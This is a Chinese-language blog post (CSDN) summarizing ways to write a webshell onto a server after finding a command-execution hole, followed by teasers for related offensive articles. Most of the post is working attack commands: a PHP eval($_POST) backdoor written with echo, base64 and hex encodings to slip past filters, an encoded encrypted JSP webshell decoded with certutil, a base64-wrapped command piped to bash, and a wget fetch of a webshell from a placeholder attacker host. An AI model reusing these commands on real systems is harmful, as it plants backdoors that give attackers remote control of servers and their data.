命令执行漏洞多种写入webshell方式总结

最新推荐文章于 2024-08-11 23:22:16 发布
最新推荐文章于 2024-08-11 23:22:16 发布
阅读量3.3k 收藏 9
点赞数 1
分类专栏: # 命令执行漏洞 文章标签: 渗透测试 web安全 命令执行 waf绕过 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129199809
版权
本文介绍了在命令行中编写shell脚本时单引号和双引号的使用区别,以及如何在Linux和Windows系统中利用echo和转换编码(如base64和hex)来写入和隐藏webshell。同时提到了如何避免重定向符的问题以及远程下载webshell的方法。
摘要由CSDN通过智能技术生成

命令行写shell注意事项:

1.注意单引号和双引号的区别:

单引号

  • 用单引号 ’ ' 括起来的字符会保留引号内每个字符的字面值

  • 简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等

  • 单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便

双引号

  • 双引号类似于单引号,只是它允许 shell 解释美元符号 ( $ )、反引号 ( ` )、反斜杠 ( \ ) 和感叹号 ( ! ), 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估

  • 双引号可以通过在双引号前加上反斜杠来使用其自身

写入webshell

确认寻找到的路径有写入权限之后,就可以开始写webshell了

1.echo直接写入

linux:

echo '<?php eval($_POST[1]); ?>' > 1.php

  • 在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。

windows:

set /p=要写的内容<nul > C:\11.txt
echo 要写的内容 > C:\11.txt

  • 在windows中,批处理需要转义字符主要有 “&”,“|”,“<”,“>”等等,转义字符为”^”

  • 直接写入webshell一般不会成功,因为webshell中使用的某些关键符号可能被转码或屏蔽

2.转换编码写入

Linux

  • base64方式写入:

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

  • hex方式写入:

hex写入与base64写入相似,在 https://www.107000.com/T-Hex/将webshell编码成hex,使用xxd命令还原

  • 或在使用前将webshell使用xxd生成hex数据

echo '<?php eval($_POST[1]); ?>' |xxd -ps

  • 然后命令注入执行

echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 3.php

windows

在windows中转换方法,是通过certutil进行转换。下面是base64以及hex的转换方式

  • certutil-Base64

echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4= > 123.txt

再通过certuti进行解码
certutil -f -decode 111.txt C:\\111.jsp

  • certutil-Hex

echo 3c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2265343565333239666562356439323562223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e > 111.txt

再通过certuti进行解码
certutil -decodehex 111.txt C:\\111.jsp

3.绕过重定向符

echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bash
echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh

  • 重定向符>不可用时,我们可以将1或2中的整体命令base64编码,然后解码后通过bash或sh执行

4.远端下载webshell

远端服务器放置webshell,开启http

python -m http.server 8000

目标机器执行

wget http://xx.xx.xxx.xx:8000/xxx.php

  • 可出网且有wget的情况下可采用此方式

通过代码执行命令执行Shell
hackzkaq的博客
08-10 4743
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 本文由团队手电筒分享,主要以干货为主-通过代码执行命令执行Shell,如果你还是个小白担心看不懂,没关系,“三步写马””如何上传木马”“如何拿下服务器并妥善管理”等实战内容可以结合视频观看,视频演示先从原理,再到实操演示,一步步清晰明了,更易吸收视频扫码领取 PHP 一.命令执行 命令执行(注入)常见可控位置情况有下面几种: system("$arg"); //可控点直接是待执行的程序 如果我们能直接控制$arg,那么就能执行
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2266
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
webshell学习总结
bcbobo21cn的专栏
12-05 4618
webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放web
无字母数字通过命令执行上传webshell复现
最新发布
wzzzzz06的博客
08-11 693
的形式来执行phpinfo()函数,因此只需要构造一个可以生成phpinfo这一串字符串的PHP表达式皆可,payload:(~%8F%97%8F%96%91%99%90)();感受:感觉非洲人还是不适合做这个,我随机生成临时文件半天,全是小写字母或者数字,搞得我以为前面做错了,还得排错,愣是卡了20多分钟,最后还是靠着sleep函数,send+cancel不断生成临时文件,最后发现有大写才搞定。
命令执行Webshell总结
hackzkaq的博客
07-20 5370
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结命令执行webshell的流程化操作。 寻找web路径 写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
catf1ag Web命令执行Webshell详解
Aiwin的博客
05-10 1288
关于catflag平台中Webshell与无字符Webshell做题的记录
DZ7.1 and 7.2 0远程代码执行漏洞获取Webshell
weixin_34116110的博客
02-11 542
DZ7.1 and 7.2 0远程代码执行漏洞获取Webshell Simeon [antian365.com] Crossday Discuz! Board 论坛系统(简称 Discuz! 论坛)是一个采用 PHP 和 MySQL 等其它多种数据库构建的高效论坛解决方案。作为商业软件产品, Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面有着良好的...
nc65命令执行漏洞上传webshell学习笔记
corner55的博客
10-28 3790
命令执行漏洞上传webshell学习笔记,测试环境nc65命令执行漏洞
命令执行漏洞
L_lemo004的博客
10-20 1383
命令执行漏洞 漏洞描述 命令执行漏洞是指服务器没有对执行命令进行过滤,用户可以随意执行系统命令命令执行漏洞属于高危漏洞之一。 如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。PHP执行命令是继承WebServer用
Webshell后门查杀
12-20
Webshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意命令,窃取数据,甚至破坏系统。在描述中提到的"处理相关问题",指的是对已知或潜在的Webshell后门进行...
SQLmap获取Webshell与系统权限:命令详解
在ASP.NET环境中,可以通过`echo`命令生成shell注入点,创建ASP页面,然后通过`Request.Item["pass"]`参数传递命令执行。 在实际应用中,SQLmap的灵活性和多样性使得它成为渗透测试人员的强大工具。然而,重要的是...
Linux WebShell
07-30
WebShell
命令执行无路径写shell
不想当脚本小子的脚本小子
12-05 3440
在实战中我们可能挖到了一个命令执行但是因为找不到目录而无法写shell,那么该如何来拿shell呢 简单来说就是:查找系统的某个文件并在那个文件的同级目录下写入我们的新文件 0x02 命令 [规定查找的盘符] 例如: c盘, d盘, e盘, f盘[查找的文件] 例如:index.php[写入的内容] 例如:<?php eval($_REQUEST[1]); ?>[写入的文件名字]例如:xx.php 命令:for /f %i in ('dir /s /b [规定查找的...
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
weixin_45366453的博客
07-02 433
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
写入webshell的几种方式
weixin_43239236的博客
01-24 2279
测试:pikachu平台 研究了几种写入webshell方式 一、上传漏洞写入 包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html 二、sql注入写入 前提是有root权限 sql注入写入一句话木马 可以根据本地包含报错查找路径 C:\xampp\htdocs\pikachu\vul\fileinclude 也可以根据 union select 1,@@datadir查找mysql data路径 C:\xam
我与网站的日常-webshell命令执行
dfdhxb995397的博客
08-18 349
本文比较基础,其中有一个知识点关于php执行系统命令的函数 ,我们用最简单的webshell来说说传值问题的影响, 本文作者: i春秋签约作家——屌丝绅士 0×01前言: 小表弟又来写文章了,这次是一个新的发现,可能对于老手来说这都是渣渣,但我会写的尽量详细,让小白看了也会懂的程度, 0×02有狗: 大佬们说的有狗多半是 “安全狗”说有WAF的时候多半是有防火墙,请求的...
网络安全攻防——webshell攻击&文件操作漏洞
CSDN
05-14 2452
文章目录1、文件加载与导入load_file ()读取服务器中的文件into outfile()向服务器导入本地文件2、一句话木马(小马)+大马+webshell2.1 一句话木马2.2 大马2.3 webshell软件2.4 附:常见命令3、文件上传漏洞4、文件包含漏洞5、文件下载漏洞6、CSRF漏洞7、总结: 1、文件加载与导入 数据库中需要开启权限,在my.ini文件的mysqld中添加语句:secure_file_priv= 表示可以导入导出到任何位置。在数据中查看权限SHOW GLOBAL VAR
一次靶机写入webshell的几种方式
u2943013702的博客
04-16 964
访问该路径,自动下载了www.zip文件,打开查看是网站的源码,那么这个应该是网站的备份源码,不知道是那个管理员放在了网站根目录,在源码的配置文件里得到了数据库的root和密码。数据库管理phpmyadmin后台拿到shell的方法有两种,一种是into outfile 直接写入,一种是通过日志写入。接下来按照传统的思想,查找表名,查找列,最后得到了网站管理员的账号和密码。这是一个由phpstudy搭建的站点的网站,尝试构造默认的网站根目录。更改路径为我们得到的绝对路径,也就是写入shell文件的位置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值